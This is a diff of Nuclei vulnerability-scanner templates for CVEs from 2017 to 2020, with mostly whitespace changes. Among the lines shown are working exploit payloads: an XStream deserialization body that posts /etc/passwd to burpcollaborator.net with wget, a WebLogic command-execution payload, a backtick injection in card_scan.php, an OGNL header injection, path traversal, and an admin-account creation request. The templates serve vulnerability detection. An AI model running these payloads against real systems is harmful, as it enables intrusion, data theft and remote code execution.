tags: cve,cve2017,trixbox,rce tags: cve,cve2017,trixbox,rce
requests: requests:

View File

@ -7,9 +7,9 @@ info:
tags: cve,cve2017,trixbox,lfi tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
requests: requests:
- raw: - raw:

View File

@ -4,8 +4,8 @@ info:
name: PreAuth RCE on Palo Alto GlobalProtect name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012 author: emadshanab,milo2012
reference: reference:
- https://www.exploit-db.com/exploits/43342 - https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect tags: cve,cve2017,rce,vpn,paloalto,globalprotect

View File

@ -7,8 +7,8 @@ info:
severity: high severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob tags: cve,cve2017,weblogic,oracle,rce,oob
reference: reference:
- https://hackerone.com/reports/810778 - https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests: requests:
- raw: - raw:

View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
reference: reference:
- https://blog.zsec.uk/cve-2017-3528/ - https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592 - https://www.exploit-db.com/exploits/43592
tags: oracle,redirect tags: oracle,redirect
requests: requests:

View File

@ -7,8 +7,8 @@ info:
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress tags: cve,cve2017,wordpress
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497 - https://www.exploit-db.com/exploits/41497
requests: requests:
- method: GET - method: GET

View File

@ -10,15 +10,15 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers: matchers:
- type: word - type: word

View File

@ -18,63 +18,63 @@ requests:
headers: headers:
Content-Type: application/xml Content-Type: application/xml
body: | body: |
<map> <map>
<entry> <entry>
<jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString>
<flags>0</flags> <flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler> <dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream"> <is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher"> <cipher class="javax.crypto.NullCipher">
<initialized>false</initialized> <initialized>false</initialized>
<opmode>0</opmode> <opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator"> <serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/> <iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder"> <next class="java.lang.ProcessBuilder">
<command> <command>
<string>wget</string> <string>wget</string>
<string>--post-file</string> <string>--post-file</string>
<string>/etc/passwd</string> <string>/etc/passwd</string>
<string>burpcollaborator.net</string> <string>burpcollaborator.net</string>
</command> </command>
<redirectErrorStream>false</redirectErrorStream> <redirectErrorStream>false</redirectErrorStream>
</next> </next>
</iter> </iter>
<filter class="javax.imageio.ImageIO$ContainsFilter"> <filter class="javax.imageio.ImageIO$ContainsFilter">
<method> <method>
<class>java.lang.ProcessBuilder</class> <class>java.lang.ProcessBuilder</class>
<name>start</name> <name>start</name>
<parameter-types/> <parameter-types/>
</method> </method>
<name>asdasd</name> <name>asdasd</name>
</filter> </filter>
<next class="string">asdasd</next> <next class="string">asdasd</next>
</serviceIterator> </serviceIterator>
<lock/> <lock/>
</cipher> </cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/> <input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer> <ibuffer></ibuffer>
<done>false</done> <done>false</done>
<ostart>0</ostart> <ostart>0</ostart>
<ofinish>0</ofinish> <ofinish>0</ofinish>
<closed>false</closed> <closed>false</closed>
</is> </is>
<consumed>false</consumed> <consumed>false</consumed>
</dataSource> </dataSource>
<transferFlavors/> <transferFlavors/>
</dataHandler> </dataHandler>
<dataLen>0</dataLen> <dataLen>0</dataLen>
</value> </value>
</jdk.nashorn.internal.objects.NativeString> </jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry> </entry>
<entry> <entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry> </entry>
</map> </map>
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -5,8 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342 - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi tags: cve,cve2018,iot,lfi
requests: requests:

View File

@ -5,8 +5,8 @@ info:
author: 0x240x23elu author: 0x240x23elu
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438 - https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi tags: cve,cve2018,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -7,8 +7,8 @@ info:
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce tags: cve,cve2018,comodo,rce
reference: reference:
- https://www.exploit-db.com/exploits/48825 - https://www.exploit-db.com/exploits/48825
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
requests: requests:
- raw: - raw:

View File

@ -7,7 +7,7 @@ info:
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass tags: cve,cve2018,appweb,auth-bypass
reference: reference:
- https://github.com/embedthis/appweb/issues/610 - https://github.com/embedthis/appweb/issues/610
requests: requests:
- raw: - raw:

View File

@ -6,9 +6,9 @@ info:
author: pdteam author: pdteam
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/ - https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob tags: cve,cve2019,apache,rce,solr,oob
requests: requests:

View File

@ -9,10 +9,10 @@ info:
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119 - https://www.exploit-db.com/exploits/50119
description: | description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is, 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default. therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website. The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss tags: cve,cve2019,apache,xss
requests: requests:

View File

@ -12,7 +12,7 @@ info:
google-dork: inurl:"/timesheet/login.php" google-dork: inurl:"/timesheet/login.php"
requests: requests:
- raw: # Metod POST From login.php - raw: # Metod POST From login.php
- | - |
POST /timesheet/login.php HTTP/1.1 POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}

View File

@ -7,9 +7,9 @@ info:
severity: medium severity: medium
tags: cve,cve2019,phpmyadmin,csrf tags: cve,cve2019,phpmyadmin,csrf
reference: reference:
- https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982 - https://www.exploit-db.com/exploits/46982
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests: requests:
- method: GET - method: GET
@ -32,4 +32,4 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
- 401 #password protected - 401 # password protected

View File

@ -7,9 +7,9 @@ info:
severity: critical severity: critical
tags: cve,cve2019,dlink,router,iot tags: cve,cve2019,dlink,router,iot
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M - https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250 - https://www.exploit-db.com/exploits/47250
requests: requests:
- raw: - raw:

View File

@ -6,7 +6,7 @@ info:
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference: reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202 - https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana tags: cve,cve2019,grafana

View File

@ -9,7 +9,7 @@ info:
tags: cve,cve2019,webmin,rce tags: cve,cve2019,webmin,rce
requests: requests:
- raw: # - raw: #
- | - |
POST /password_change.cgi HTTP/1.1 POST /password_change.cgi HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}

View File

@ -6,8 +6,8 @@ info:
description: | description: |
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
reference: reference:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951 - https://github.com/goharbor/harbor/issues/8951
tags: cve,cve2019,intrusive,harbor tags: cve,cve2019,intrusive,harbor
requests: requests:
@ -17,7 +17,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -14,7 +14,7 @@ requests:
- "{{BaseURL}}/getcfg.php" - "{{BaseURL}}/getcfg.php"
body: | body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers: headers:
Content-Type: text/xml Content-Type: text/xml

View File

@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- https://www.exploit-db.com/exploits/46729 - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob tags: cve,cve2019,oracle,xxe,oob
requests: requests:

View File

@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729 - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob tags: cve,cve2019,oracle,xxe,oob
requests: requests:

View File

@ -10,16 +10,16 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /rest/tinymce/1/macro/preview HTTP/1.1 POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Accept-Language: en-US,en;q=0.5 Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}} Referer: {{Hostname}}
Content-Length: 168 Content-Length: 168
Connection: close Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -6,8 +6,8 @@ info:
severity: critical severity: critical
tags: cve,cve2019,nexus,rce tags: cve,cve2019,nexus,rce
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238
requests: requests:
- raw: - raw:

View File

@ -11,7 +11,7 @@ info:
tags: cve,cve2019,emerge,rce tags: cve,cve2019,emerge,rce
requests: requests:
- raw: # Default Port - raw: # Default Port
- | - |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}

View File

@ -13,22 +13,22 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Length: 60 Content-Length: 60
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
X-Requested-With: artUI X-Requested-With: artUI
serial: 58 serial: 58
X-Forwarded-For: 127.0.0.1 X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json Content-Type: application/json
Origin: http://{{Hostname}} Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/ Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
Connection: close Connection: close
{"user":"access-admin","password":"password","type":"login"} {"user":"access-admin","password":"password","type":"login"}
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
severity: critical severity: critical
reference: reference:
- https://www.exploit-db.com/exploits/46537 - https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi tags: cve,cve2019,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -6,9 +6,9 @@ info:
severity: low severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
reference: reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034 - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect tags: cve,cve2020,redirect

View File

@ -5,9 +5,9 @@ info:
severity: high severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference: reference:
- https://github.com/pberba/CVE-2020-11978 - https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418 - https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce tags: cve,cve2020,apache,airflow,rce
requests: requests:

View File

@ -10,16 +10,16 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper # This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user. # prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer # Authentication is bypassed by sending a random whitelisted Referer
# header in each request. # header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable. # been confirmed exploitable.
requests: requests:
- method: GET - method: GET

View File

@ -6,9 +6,9 @@ info:
severity: high severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: | description: |
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress tags: cve,cve2020,wordpress
requests: requests:

View File

@ -5,12 +5,12 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: | description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication, Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone. so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: reference:
- https://kylin.apache.org/docs/release_notes.html - https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html - https://s.tencent.com/research/bsafe/1156.html

View File

@ -17,7 +17,7 @@ requests:
Test-Header: cat /etc/passwd Test-Header: cat /etc/passwd
body: | body: |
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii tags: cve,cve2020,rce,yii
requests: requests:

View File

@ -6,10 +6,10 @@ info:
severity: high severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
